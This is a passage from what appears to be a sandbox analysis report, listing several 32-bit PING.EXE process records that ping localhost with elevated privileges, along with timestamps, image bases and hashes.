Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	21
Start time:	11:04:14
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0x7f0000
File size:	15'360 bytes
MD5 hash:	6242E3D67787CCBF4E06AD2982853144
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	22
Start time:	11:04:15
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 2
Imagebase:	0x7f0000
File size:	15'360 bytes
MD5 hash:	6242E3D67787CCBF4E06AD2982853144
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	23
Start time:	11:04:18
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 2
Imagebase:	0x7f0000
File size:	15'360 bytes
MD5 hash:	6242E3D67787CCBF4E06AD2982853144
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	25
Start time:	11:04:19
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 2
Imagebase:	0xb20000
File size:	15'360 bytes
MD5 hash:	6242E3D67787CCBF4E06AD2982853144
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	26
Start time:	11:04:20
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 2
Imagebase:	0x30000
File size:	15'360 bytes
MD5 hash:	6242E3D67787CCBF4E06AD2982853144
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	27
Start time:	11:04:22
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 2
Imagebase:	0x680000
File size:	15'360 bytes
MD5 hash:	6242E3D67787CCBF4E06AD2982853144
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	28
Start time:	11:04:23
Start date:	29/03/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 2
Imagebase:	0x940000
File size:	15'360 bytes
MD5 hash:	6242E3D67787CCBF4E06AD2982853144
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true